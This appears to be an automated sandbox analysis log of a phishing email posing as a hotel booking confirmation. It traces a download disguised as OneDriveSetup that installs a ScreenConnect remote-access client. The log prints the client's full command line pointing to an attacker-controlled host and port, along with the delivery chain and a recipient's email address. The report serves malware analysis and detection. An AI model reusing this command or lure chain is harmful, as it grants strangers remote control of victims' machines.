                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49679 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49671 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
                      Source: C:\Windows\System32\mmc.exeWindow created: window name: CLIPBRDWNDCLASS

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\564c49.msi
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\inprogressinstallinfo.ipi
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\SourceHash{4B6C036E-28DA-1655-4F4C-DB2C91ACA822}
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4F17.tmp
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI4F38.tmp
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\MSI512D.tmp
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\564c4b.msi
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\564c4b.msi
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{4B6C036E-28DA-1655-4F4C-DB2C91ACA822}
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\{4B6C036E-28DA-1655-4F4C-DB2C91ACA822}\DefaultIcon
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Windows\SystemTemp\scoped_dir7336_627564547
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (d241e538b9eb3f0a)
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (d241e538b9eb3f0a)\3cv5b3ep.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeFile created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (d241e538b9eb3f0a)\3cv5b3ep.newcfg
                      Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSI4F38.tmp
                      Source: classification engineClassification label: mal76.evad.winMSG@84/84@92/211
                      Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeMutant created: NULL
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20250307T1732400905-6892.etl
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile read: C:\Users\desktop.ini
                      Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI436F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5653593 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\Dear david@corerecon.com - Your Stay Has Been Successfully Booked Ocean Breeze Retreat.msg"
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "45AE51B9-404E-41AC-B6B3-06509E284573" "2B13D4B0-6C0C-40D8-AAB1-E470D827B26A" "6892" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
                      Source: unknownProcess created: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxOutlook.exe" -ServerName:microsoft.windowslive.mail.AppXfbjsbkxvprcgqg6q4c9jfr0pn3kv9x5s.mca
                      Source: unknownProcess created: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exe "C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe\HxAccounts.exe" -ServerName:microsoft.windowslive.manageaccounts.AppXdbf3yp5apt3t7q877db3gnz5zqpf71zj.mca
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://cl.s12.exct.net/?qs=dd02f46a2b01ff14c8b7f5d6eee791994ec9db7224e2b8c6008c3bb428429855c449a2273d72377f007301aae3a4af35ed3799ed1629b547
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://cl.s12.exct.net/?qs=dd02f46a2b01ff14c8b7f5d6eee791994ec9db7224e2b8c6008c3bb428429855c449a2273d72377f007301aae3a4af35ed3799ed1629b547
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "45AE51B9-404E-41AC-B6B3-06509E284573" "2B13D4B0-6C0C-40D8-AAB1-E470D827B26A" "6892" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2028,i,4087323018114762375,9119903113655532610,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2080 /prefetch:3
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://cl.s12.exct.net/?qs=dd02f46a2b01ff14c8b7f5d6eee791994ec9db7224e2b8c6008c3bb428429855c449a2273d72377f007301aae3a4af35ed3799ed1629b547
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://cl.s12.exct.net/?qs=dd02f46a2b01ff14c8b7f5d6eee791994ec9db7224e2b8c6008c3bb428429855c449a2273d72377f007301aae3a4af35ed3799ed1629b547
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=2028,i,4087323018114762375,9119903113655532610,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2080 /prefetch:3
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\Downloads\OneDriveSetup (1).exe "C:\Users\user\Downloads\OneDriveSetup (1).exe"
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.4.4.9118\d241e538b9eb3f0a\ScreenConnect.ClientSetup.msi"
                      Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0F46587D044F7C61BD85AC8DFD726F62 C
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI436F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5653593 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 031E0E48DE3D13F9D2BD5DCF3BCB9F6E
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 92F38BA88A466C77B1F7FCBAC077F3D4 E Global\MSI0000
                      Source: unknownProcess created: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe "C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=bookinghqsupport.top&p=8041&s=8d8131d8-05a3-44ca-a0f5-2c7287519a41&k=BgIAAACkAABSU0ExAAgAAAEAAQCt6sszjYdR%2fljMO5hPN8Us4uYaE1KfX0EMr5MgD6WzfJDx5V16IAULD7anuBGtX0F3LF1idCdY6kpNAJJAQDV62l1xEtKhzqEJfLAHnrYNkI4IgddX3uDlj%2bQ5ccf18AynIy9sXt2XekatDPx%2bHEawZxuMC46pODU5uafzSkOJ3zhdQfKucobIYw%2f65wL6MiNAHyNGePUbZTnU97ItnoW%2bN22p2gzqZziqkFuuwABhjcLPNBQHLNuuKEC1vR2lxX3EzdRdKmLntP6LMt39dgW8sSIitIZom5OMFnV7U8H8LA819gdb3BqbA%2fSR%2fj57hzMJtK78Yzxu2%2fz9YPP9DzDB&c=OneDriveSetup%20FB&c=&c=&c=&c=&c=&c=&c="
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe" "RunRole" "9f785d80-c7b6-460e-b2b7-083465355376" "User"
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe" "RunRole" "685ea6e3-f4f1-4a5d-b64b-7c74b24aed78" "System"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalService -p -s BthAvctpSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k UnistackSvcGroup
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
                      Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k netsvcs -p -s lfsvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\Downloads\OneDriveSetup (1).exe "C:\Users\user\Downloads\OneDriveSetup (1).exe"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Users\user\Downloads\OneDriveSetup (1).exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.4.4.9118\d241e538b9eb3f0a\ScreenConnect.ClientSetup.msi"
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 0F46587D044F7C61BD85AC8DFD726F62 C
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 031E0E48DE3D13F9D2BD5DCF3BCB9F6E
                      Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 92F38BA88A466C77B1F7FCBAC077F3D4 E Global\MSI0000
                      Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI436F.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_5653593 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                      Source: unknownProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\system32\services.msc"
                      Source: unknownProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\system32\services.msc"
                      Source: unknownProcess created: C:\Windows\System32\sppsvc.exe C:\Windows\system32\sppsvc.exe
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\24.4.4.9118\d241e538b9eb3f0a\ScreenConnect.ClientSetup.msi"
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe" "RunRole" "9f785d80-c7b6-460e-b2b7-083465355376" "User"
                      Source: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.ClientService.exeProcess created: C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe "C:\Program Files (x86)\ScreenConnect Client (d241e538b9eb3f0a)\ScreenConnect.WindowsClient.exe" "RunRole" "685ea6e3-f4f1-4a5d-b64b-7c74b24aed78" "System"
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
                      Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
